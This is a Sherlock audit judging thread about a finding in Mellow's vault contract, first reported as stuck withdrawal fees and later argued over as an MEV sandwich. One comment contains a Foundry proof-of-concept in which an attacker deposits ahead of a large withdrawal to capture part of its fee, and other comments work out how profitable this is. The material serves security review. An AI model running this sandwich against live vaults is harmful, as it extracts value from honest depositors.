### ISSUE TITLE
scammed - Withdrawal fee cannot be claimed and will be stuck in the Vault

### ISSUE THREAD

**Issue by sherlock-admin4** [sherlock-audit/2024-06-mellow-judging#244]
scammed

Medium

# Withdrawal fee cannot be claimed and will be stuck in the Vault

## Summary

All the fees ever taken in the form of LST tokens will be stuck in the vault as there is no way to be retrieved by anyone due to a missing function.

## Vulnerability Detail

When withdrawal happens there is a withdrawFee taken, which in normal scenarios is redeposited in the strategies so it continuously increases the lpToken price. The problem is that this fee cannot be withdrawn from anyone and when the last withdrawal happens it will remain locked in the Vault with no way to be retrieved.

Consider the following example:

Vault has a single underlying token, the exchange rate of the lpToken is 1:1, both `totalValue` and `totalSupply` are 100 tokens and `withdrawalFee` is 5% (5e7)

There are 2 users left in the Vault with equally distributed lpToken and both of them have their withdrawal requests executed:

```solidity
function analyzeRequest(
      ProcessWithdrawalsStack memory s,
      WithdrawalRequest memory request
  ) public pure returns (bool, bool, uint256[] memory expectedAmounts) {
      uint256 lpAmount = request.lpAmount;
      if (
          request.tokensHash != s.tokensHash || request.deadline < s.timestamp
      ) return (false, false, expectedAmounts);

      uint256 value = FullMath.mulDiv(lpAmount, s.totalValue, s.totalSupply);
      value = FullMath.mulDiv(value, D9 - s.feeD9, D9);
      uint256 coefficientX96 = FullMath.mulDiv(value, Q96, s.ratiosX96Value); 

      uint256 length = s.erc20Balances.length;
      expectedAmounts = new uint256[](length);
      for (uint256 i = 0; i < length; i++) {
          uint256 ratiosX96 = s.ratiosX96[i];
          expectedAmounts[i] = ratiosX96 == 0
              ? 0
              : FullMath.mulDiv(coefficientX96, ratiosX96, Q96); // (394140184405850747 * (2^96 / 2)) / 2^96
          if (expectedAmounts[i] >= request.minAmounts[i]) continue;
          return (false, false, expectedAmounts);
      }
      for (uint256 i = 0; i < length; i++) {
          if (s.erc20Balances[i] >= expectedAmounts[i]) continue;
          return (true, false, expectedAmounts);
      }
      return (true, true, expectedAmounts);
  }
```
Important to note that all the values will be equal since  `Vault::calculateStack` is called only at the beginning of the `processWithdrawals` and values for both users will be the same.

First user `analyzeRequest`:

1. Value = (50 / 100) * 100 = 50
2. Value with fee taken = 50 - 5% = 47.5
3. coefficientX96 = 47.5 * ~~2^96~~ / ~~2^96~~ (can fluctuate a bit depending on the underlying token price in terms of ETH, we assume 1:1 as well, for simplicity and the fact this has no effect on the funds left in the end)
4. expectedAmount = 47.5 (tokens transferred to the user)

Second user `analyzeRequest`:

1. Value = (50 / 100) * 100 = 50
2. Value with fee taken = 50 - 5% = 47.5
3. coefficientX96 = 47.5 * ~~2^96~~ / ~~2^96~~ (can fluctuate a bit depending on the underlying token price in terms of ETH, we assume 1:1 as well, for simplicity and the fact this has no effect on the funds left in the end)
4. expectedAmount = 47.5 (tokens transferred to the user)

After the withdrawals, state of the Vault looks like this:

- `totalValue` = 100 - (47.5 * 2) = 5 tokens
- `totalSupply` = 50 = 0

In conclusion there will be at least 5 tokens left for this configuration as the amount will increase when the amount of withdrawal requests processed also increases.

## Impact

- After last withdrawals fees accumulated will be locked in the Vault without a way to be retrieved

## Code Snippet

https://github.com/sherlock-audit/2024-06-mellow/blob/main/mellow-lrt/src/Vault.sol#L476-L504

## Tool used

Manual Review

## Recommendation

Add a function to claim the excess withdrawal fees.

**Comment by 0x3b33** [comment]
Escalate

This report showcases how after the last withdrawal from the system, the fee will be locked in the Vault without a way to be retrieved from anyone, even from the Vault owner. An important caveat here is that Vaults are permissionless, aka everyone can deploy his own and operate it, this makes the issue serious as all Vault owners will not be able to get their fees.

The numbers presented in the report are taken directly from the tests. 

The design decision of the team to lock the `withdrawal fee` is applicable only until there is an activity in the Vault and the price of the `lpTokens` is increasing. In the `last players` scenarios it is clearly visible that the fee taken will be locked in the Vault.

**Comment by sherlock-admin3** [comment]
> Escalate
> 
> This report showcases how after the last withdrawal from the system, the fee will be locked in the Vault without a way to be retrieved from anyone, even from the Vault owner. An important caveat here is that Vaults are permissionless, aka everyone can deploy his own and operate it, this makes the issue serious as all Vault owners will not be able to get their fees.
> 
> The numbers presented in the report are taken directly from the tests. 
> 
> The design decision of the team to lock the `withdrawal fee` is applicable only until there is an activity in the Vault and the price of the `lpTokens` is increasing. In the `last players` scenarios it is clearly visible that the fee taken will be locked in the Vault.

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

**Comment by IronsideSec** [comment]
state of the Vault at the end, `last withdrawals fees accumulated will be locked in the Vault`

Another impact of this issue is, its prone to possible MEV extraction. 
If protocol wants to increase share value instead of withdrawing that fees, then it can be captured by MEV which should have gone to honest stakers. 
check #116

**Comment by WangSecurity** [comment]
Agree with the escalation, planning to accept it and validate with medium severity. Duplicates: #116. Are there additional duplicates @z3s @0x3b33 @IronsideSec ?

**Comment by 0x3b33** [comment]
No, as far as I know there are no other duplicates for this issue.

**Comment by 10xhash** [comment]
> Agree with the escalation, planning to accept it and validate with medium severity. Duplicates: #116. Are there additional duplicates @z3s @0x3b33 @IronsideSec ?

An initial amount of shares is meant to be sacrificed to the vault not being accessible to anybody 
```solidity
    function _processLpAmount(
        address to,
        uint256 depositValue,
        uint256 totalValue,
        uint256 minLpAmount
    ) private returns (uint256 lpAmount) {
        uint256 totalSupply = totalSupply();
        if (totalSupply == 0) {
            // scenario for initial deposit
            _requireAtLeastOperator();
            lpAmount = minLpAmount;
            if (lpAmount == 0) revert ValueZero();
            if (to != address(this)) revert Forbidden();
        } else {
```

The intention of fees is to increase the lp value for the other user's and not to have admins withdraw these fees. Which can be done anyways after vault closure (if required) since the entire vault is under the control of admin via external call and delegate call functionality

**Comment by IronsideSec** [comment]
@10xhash it is true that the last withdrawer's fees can be moved via external call. 

If not collecting fees is intended in order to increase LP value, then there ia MEV extraction on every withdrawal. Check POC on #116 

Fix : Collect the fees on each withdrawal. Then once a week the admin can claim them all and can use private tx to send funds directly to vault increasing the lp value to all depositers. So that no MEV is possible.

**Comment by 0xHuntoor** [comment]
@IronsideSec  for 10 ETH i get 0.01ETH even though you used a withdrawal fee taken from a 200 ETH request?

0.01 ETH not covering the txn fees sir

i see extreme numbers used to inflate the issue #116 

Hash, said enough, adding to it (withdrawal fee is meant to disincentive withdrawals to increase TVL gradually, using the 2 persons example is misleading, and as hash said funds can be recovered

**Comment by IronsideSec** [comment]
@IlIlHunterlIlI

> 0.01 ETH not covering the txn fees sir

current at < 10 gwei, it wont cost more than 5$, and #116  POC covers one of the combination (200 eth withdrawal and mev bot using 10 eth you can turn into 10.012 eth), profiting 0.012  eth ($42) at $3500/eth

>i see extreme numbers used to inflate the issue #116

Its not inflated sir, 200 eth is only $700k and almost half the tvl contrivutors in LST protocols are biggies like these, so when they withdraw  like these MEV acheivable. Also, imagine how may 20 eth and 50 eth withdrawals are done. They can also be MEVed , but  profits wont be $40 but 10- 15 $. And this likelihood of many 50eth withdrawals, easy initial capital for bot setup makes it a medium.

I used 10 eth as attacker balance to show how easy and low intial setup  bots can do MEV.

**Comment by 0xHuntoor** [comment]
talking about the 200ETH withdrawal that is infalted with only three users are in vault and how even the mev bot will withdraw?
he will have to wait the `withdrawalEmergencyDelay()`

`10 Gwei`? reconsider the cost of function execution, this is not a normal txn.

will be happy to answer your considerations but will try not to repeat my self for a smooth judging process

**Comment by IronsideSec** [comment]
The whole MEV action 

user victim ==            ├─ [234606] Vault::registerWithdrawal
mev bot ==.                ├─ [134690] Vault::deposit
protocol backend == ├─ [87692] Vault::processWithdrawals(
mev bot ==                 ├─ [234606] Vault::registerWithdrawal
protocol backend == ├─ [47792] Vault::processWithdrawals

> 10 Gwei? reconsider the cost of function execution, this is not a normal txn.

so, bot has to spend   ~370k units  costing 0.0037 eth ($12.5) at 10 gwei, and profit is (0.012 - 0.0037) = 0.0083 eth == $29
so $29 profit for 200 eth user's withrawal with only 10 eth as initial capital and he has to wait `dealy` time to withdraw. Its still a good strategy. 

look at this [mellow vault](https://etherscan.io/token/0x5fD13359Ba15A84B76f7F87568309040176167cd#balances), there are 15 guys with 200 eth worth bal and 28 guys with > 100 eth worth balance. With good initial capital, mev on their withdrawals is profitable + you cannot make it as inflated assumption. Plus there are also 10 more heavy vaults https://app.mellow.finance/restake

You are repeating 200 eth as inflated, please read this  comment and  [above comment](https://github.com/sherlock-audit/2024-06-mellow-judging/issues/244#issuecomment-2235672789) again.

**Comment by WangSecurity** [comment]
Based on the fact that the fee indeed can be retrieved and won't be stuck after the last withdrawal, I believe this report is incorrect, since the impact is false.

Planning to reject the escalation and leave the issue as it is.

**Comment by IronsideSec** [comment]
@WangSecurity Yes, fee indeed can be retrieved and won't be stuck after the last withdrawal. 

But what about the MEV impact ?  Please check POC on #116 and profitability discussed [here](https://github.com/sherlock-audit/2024-06-mellow-judging/issues/244#issuecomment-2236032337)
Didn't escalate #116 separately because, it has same impact and route cause + fix  as this.

> Paste the below POC into `Vault.t.sol.t.sol` on `tests/mainnet/` folder  and then run  `forge t --mt testMEV --vvvv`

<details>
<summary>POC (click to dropdown) </summary>

```solidity
// SPDX-License-Identifier: BSL-1.1
pragma solidity 0.8.25;

import "../mainnet/Constants.sol";
import "../../src/Vault.sol";
import "forge-std/Test.sol";
import "forge-std/Vm.sol";


contract VaultTestMEV is Test {
    using SafeERC20 for IERC20;

    address public immutable admin = address(this);
    address public immutable operator =address(this);
    address user1 = address(1);
    address user2 = address(2);
    address user3 = address(3);
    address attacker = address(bytes20(keccak256((hex"c0ffee"))));

    Vault vault;


    function testMEV() public {
        console.log('Balance before : WSTETH.balanceOf(attacker): ', IERC20(Constants.WSTETH).balanceOf(attacker));
        assertEq(IERC20(Constants.WSTETH).balanceOf(attacker), 10e18);
    
        uint[] memory minAmounts = new uint[](1);
        minAmounts[0] = 200e18  * 99 / 100;
        vm.prank(user2);
        vault.registerWithdrawal(user2, 200e18, minAmounts, type(uint).max, type(uint).max, false);

        uint[] memory amounts = new uint[](1);
        amounts[0] = 10e18;
        vm.prank(attacker);
        vault.deposit(address(attacker), amounts, 10e18, type(uint).max);

        address[] memory users = new address[](1);
        users[0] = user2;
        vault.processWithdrawals(users);


        minAmounts[0] = 10e18  * 99 / 100;
        vm.prank(attacker);
        vault.registerWithdrawal(attacker, 10e18, minAmounts, type(uint).max, type(uint).max, false);


        users[0] = attacker;
        vault.processWithdrawals(users);

        assertGt(IERC20(Constants.WSTETH).balanceOf(attacker), 10e18);
        console.log('Balance After : WSTETH.balanceOf(attacker): ', IERC20(Constants.WSTETH).balanceOf(attacker));
    }


    function setUp() public {
        vm.createSelectFork("https://eth.llamarpc.com", 20173392);
        vault = new Vault("stake","stake",admin);
        ERC20TvlModule erc20TvlModule = new ERC20TvlModule();
        vault.addTvlModule(address(erc20TvlModule));

        vault.addToken(Constants.WSTETH);
        VaultConfigurator configurator = VaultConfigurator(
            address(vault.configurator())
        );

        // oracles setup
        {
            ManagedRatiosOracle ratiosOracle = new ManagedRatiosOracle();

            uint128[] memory ratiosX96 = new uint128[](1);
            ratiosX96[0] = 2 ** 96;
            ratiosOracle.updateRatios(address(vault), true, ratiosX96);
            ratiosOracle.updateRatios(address(vault), false, ratiosX96);

            configurator.stageRatiosOracle(address(ratiosOracle));
            configurator.commitRatiosOracle();

            ChainlinkOracle chainlinkOracle = new ChainlinkOracle();
            chainlinkOracle.setBaseToken(address(vault), Constants.WSTETH);
            address[] memory tokens = new address[](1);
            tokens[0] = Constants.WSTETH;

            IChainlinkOracle.AggregatorData[]
                memory data = new IChainlinkOracle.AggregatorData[](1);
            data[0] = IChainlinkOracle.AggregatorData({
                aggregatorV3: address(
                    new WStethRatiosAggregatorV3(Constants.WSTETH)
                ),
                maxAge: 30 days
            });
            chainlinkOracle.setChainlinkOracles(address(vault), tokens, data);

            configurator.stagePriceOracle(address(chainlinkOracle));
            configurator.commitPriceOracle();
        }

        configurator.stageMaximalTotalSupply(10000 ether);
        configurator.commitMaximalTotalSupply();

        ManagedValidator validator = new ManagedValidator(admin);
        configurator.stageValidator(address(validator));
        configurator.commitValidator();
        validator.grantContractRole(address(vault), 100);
        validator.grantRole(address(user1), 100);
        validator.grantRole(address(user2), 100);
        validator.grantRole(address(user3), 100);
        validator.grantRole(address(attacker), 100);

        vm.label(user1, "user:1");
        vm.label(user2, "user:2");
        vm.label(user3, "user:3");
        vm.label(attacker, "attacker");
        vm.label(Constants.WSTETH, "WSTETH");
        deal(Constants.WSTETH, user1, 100e18);
        deal(Constants.WSTETH, user2, 200e18);
        deal(Constants.WSTETH, user3, 50e18);
        deal(Constants.WSTETH, attacker, 10e18);

        vm.prank(user1);
        IERC20(Constants.WSTETH).approve(address(vault), type(uint).max);
        vm.prank(user2);
        IERC20(Constants.WSTETH).approve(address(vault), type(uint).max);
        vm.prank(user3);
        IERC20(Constants.WSTETH).approve(address(vault), type(uint).max);
        vm.prank(attacker);
        IERC20(Constants.WSTETH).approve(address(vault), type(uint).max);

        deal(Constants.WSTETH, address(this), 1000);
        IERC20(Constants.WSTETH).approve(address(vault), type(uint).max);
        uint[] memory amounts = new uint[](1);
        amounts[0] = 1000;
        vault.deposit(address(vault), amounts, 1000, type(uint).max);

        amounts[0] = 100e18;
        vm.prank(user1);
        vault.deposit(address(user1), amounts, 100e18, type(uint).max);
        amounts[0] = 200e18;
        vm.prank(user2);
        vault.deposit(address(user2), amounts, 200e18, type(uint).max);
        amounts[0] = 50e18;
        vm.prank(user3);
        vault.deposit(address(user3), amounts, 50e18, type(uint).max);


        configurator.stageWithdrawalFeeD9(5e6); // 5%
        configurator.commitWithdrawalFeeD9();
    }


}
```
</details>

**Comment by WangSecurity** [comment]
Very good scenario actually, there's another report that talks about it. But in my view it's actually a design decision as well. As I understand the design of the protocol is to allocate the reward on the pro-rata basis to everyone invested in the protocol at that moment. Hence, if the attacker invests in the protocol before the withdrawal, they will get the share of fees cause they were invested in that moment and contributed to the vault.

My current decision is to reject the escalation and leave the issue as it is. But before I finally resolve the escalation I'll take additional time to think about it. If in the end I resolve the escalation, then it means I decided to keep my decision. Otherwise, I'll make a statement about the new decision and why I believe it's valid.

**Comment by IronsideSec** [comment]
Yes, After reading #162, the MEV likelihood and imapct increases. In my POC i used only one guy's withdrawal, there itself we got $30 protfit for 200eth withdrawal. Now imagine when admin processes multiple withdrawals in one tx. Then the MEV profitability is so high now.

Design decision should never allow leaking value imo. There is a simple fix, just collect the fees and send to admin. Admin will donate those fees back to pool once a week in private tx. So your design decision of allowing withdrawal fees back to stakers is still valid with no MEV.

**Comment by 0xh2134** [comment]
> Hence, if the attacker invests in the protocol before the withdrawal, they will get the share of fees cause they were invested in that moment and contributed to the vault.

They are not actually investing and contributing to the vault but seeking for a arbitrage.

**Comment by 0xHuntoor** [comment]
they are opted for a delay 
Delay -> being stayed in Vault -> investing

**Comment by 0xh2134** [comment]
> they are opted for a delay Delay -> being stayed in Vault -> investing

You are right about the delay, however, it's not really an investment if no funds are staked in the bond module hence no contribution to the vault, attacker can sandwich when bond staking limit is reached and submit a withdrawal request right after the arbitrage.

**Comment by 0xHuntoor** [comment]
in `Vault::Deposit()` -> this is called `IDepositCallback(callback).depositCallback(actualAmounts, lpAmount);`
in `DefaultBondStrategy` we see the following
```solidity
    function _deposit() private {
        ITvlModule.Data[] memory tvl = erc20TvlModule.tvl(address(vault));
        for (uint256 i = 0; i < tvl.length; i++) {
            address token = tvl[i].token;
            bytes memory data_ = tokenToData[token];
            if (data_.length == 0) continue;
            Data[] memory data = abi.decode(data_, (Data[]));
            for (uint256 j = 0; j < data.length; j++) {
                uint256 amount = FullMath.mulDiv(
                    tvl[i].amount,
                    data[j].ratioX96,
                    Q96
                );
                if (amount == 0) continue;
                vault.delegateCall(
                    address(bondModule),
                    abi.encodeWithSelector(
                        IDefaultBondModule.deposit.selector,
                        data[j].bond,
                        amount
                    )
                );
            }
        }
    }

    /// @inheritdoc IDepositCallback
    function depositCallback(uint256[] memory, uint256) external override {
        if (msg.sender != address(vault)) _requireAtLeastOperator();
        _deposit();
    }
```

so in fact there is a risk on their funds and in fact their deposits is used in bondModule 

my above argument assumes that deposit fall back is implemented and this check would pass in `Vault::Deposit()`

```solidity
        address callback = configurator.depositCallback();
        if (callback == address(0)) return (actualAmounts, lpAmount);
```

if not implemented then yes you are right there are no risks on their funds

in fact in their deployment script we see this
```solidity
File: DeployScript.sol
184:         {
185:             s.configurator.stageDepositCallback(address(s.defaultBondStrategy));
186:             s.configurator.commitDepositCallback();
187:         }
```

meaning they implement it on deployment

**Comment by blckhv** [comment]
Deployment script is not in the scope of the audit so we can't assume the configuration will be always the same, indeed our work is to tweak the system, trying to find a configuration that allows malicious actions to be possible. Vault can be configured both with and without callback, and depending on that the states of the Vault will be different which is a valid case.
The deployment script also shows that only wstETH will be used for the Vault, does that mean all the issues related to other assets in the scope should be invalidated just because they are not included in the **first** iteration of the protocol?

**Comment by 0xHuntoor** [comment]
> Deployment Script not in scope

this means we don't submit issues in its code but doesn't mean its useless

Since i know Wang is going to ask about it then i referenced it, cause it gives the initial intent of developers

I totally disagree to judge an issue according to intention of deployment script initially, so your last paragraph is totally correct to me

**Comment by IronsideSec** [comment]
Stop commenting huge code, use links. Also, please don't do huge thread discusiion kind chats here. It diverts others's comments.

Wang, reconsider [this comment](https://github.com/sherlock-audit/2024-06-mellow-judging/issues/244#issuecomment-2240822033) before final decision.

**Comment by WangSecurity** [comment]
> Deployment script is not in the scope of the audit so we can't assume the configuration will be always the same

yes, it's not in scope, but for Admin limitation questions we allow the protocol to submit the deployment script so we can see which values will be used for admin variables.

Secondly, as I understand based on [this comment](https://github.com/sherlock-audit/2024-06-mellow-judging/issues/208#issuecomment-2241085931) the assets are deposited into respective strategies. Hence, [this comment](https://github.com/sherlock-audit/2024-06-mellow-judging/issues/244#issuecomment-2240947317) is wrong, no?

> Stop commenting huge code, use links. Also, please don't do huge thread discusiion kind chats here. It diverts others's comments.

Yep, general advice for everyone, you can just send links and name lines of code you're referring to.

**Comment by 0xh2134** [comment]
> Secondly, as I understand based on https://github.com/sherlock-audit/2024-06-mellow-judging/issues/208#issuecomment-2241085931 the assets are deposited into respective strategies. Hence, https://github.com/sherlock-audit/2024-06-mellow-judging/issues/244#issuecomment-2240947317 is wrong, no?

https://github.com/sherlock-audit/2024-06-mellow-judging/issues/244#issuecomment-2240947317 is not wrong.

https://github.com/sherlock-audit/2024-06-mellow-judging/issues/208#issuecomment-2241085931 assumes the funds need to be withdrawn from Bond to process the withdrawal requests, and after the withdrawal the assets (if any) in the vault will be deposited back into Bond. But it's not always the case.

The [deposit()](https://github.com/sherlock-audit/2024-06-mellow/blob/26aa0445ec405a4ad637bddeeedec4efe1eba8d2/mellow-lrt/src/modules/symbiotic/DefaultBondModule.sol#L11-L14) is called through [depositCallback()](https://github.com/sherlock-audit/2024-06-mellow/blob/26aa0445ec405a4ad637bddeeedec4efe1eba8d2/mellow-lrt/src/strategies/DefaultBondStrategy.sol#L78) to [deposit](https://github.com/sherlock-audit/2024-06-mellow/blob/26aa0445ec405a4ad637bddeeedec4efe1eba8d2/mellow-lrt/src/strategies/DefaultBondStrategy.sol#L51) assets into bond, however, if the Bond's limit is reached, assets won't be deposited and funds are left in the vault.
> DefaultBondStrategy:
```solidity
                vault.delegateCall(
                    address(bondModule),
                    abi.encodeWithSelector(
@>                      IDefaultBondModule.deposit.selector,
                        data[j].bond,
                        amount
                    )
```
> DefaultBondModule:
```solidity
        amount = Math.min(
            amount,
            IDefaultBond(bond).limit() - IBond(bond).totalSupply()
        );
@>      if (amount == 0) return 0;
```

**It's possible that there are sufficient assets left in the vault for processing withdrawal** due to that the Bond's limit is reached, so even if attacker front-run to perform sandwich attack, their funds won't be deposited into the Bond, hence they can receive the funds back after the next withdrawal batch, it's basically risk free.

**Comment by WangSecurity** [comment]
Thank you for the clarification! After further considering the scenario when the attacker deposits before the withdrawal batch, receives the withdrawal fee and makes a withdrawal request right after it, I agree it's a valid scenario and allows to extract value from the protocol and honest depositors.

But, this issue specifically, doesn't show this scenario and the issue expressed here is invalid, as was expressed earlier. Hence, this report is not a sufficient duplicate, since it doesn't have a valid attack/vulnerability path and doesn't have a medium impact. Hence, this escalation will be rejected, because #162 which found a valid scenario is also escalated.

**Comment by blckhv** [comment]
As other other wardens pointed this report identifies the root cause of the issue despite demonstrating a slightly different impact.

> Didn't escalate https://github.com/sherlock-audit/2024-06-mellow-judging/issues/116 separately because, it has same impact and route cause + fix as this.

Basically from here all the mentioned outcomes are not intended and will cause issues to the Vault itself. I agree that the primary one successfully manages to benefit from the locked tokens and cause harm to the protocol and this one succeeds in identifying the locked tokens and the only thing lacking is the exact same impact as the primary one.

**Comment by WangSecurity** [comment]
I see that the report identified a root cause, but with the current duplication rules, there should be a medium impact, valid attack/vulnerability path and other requirements met. No other requirements (e.g. POC) is not needed for that report, the report has a vulnerability path, but lacks medium impact.

The decision remains the same, planning to reject the escalation and leave this issue as it is.

**Comment by WangSecurity** [comment]
Result:
Invalid
Unique

**Comment by sherlock-admin4** [comment]
Escalations have been resolved successfully!

Escalation status:
- [0x3b33](https://github.com/sherlock-audit/2024-06-mellow-judging/issues/244/#issuecomment-2230403822): rejected
